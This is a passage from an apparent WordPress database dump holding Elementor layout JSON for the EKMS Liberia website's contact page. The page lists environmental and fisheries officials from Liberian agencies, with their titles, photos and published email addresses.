href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23512,3421,'_elementor_edit_mode','builder'),(23513,3421,'_elementor_template_type','wp-page'),(23514,3421,'_elementor_version','3.0.16'),(23515,3421,'_wp_page_template','default'),(23516,3421,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id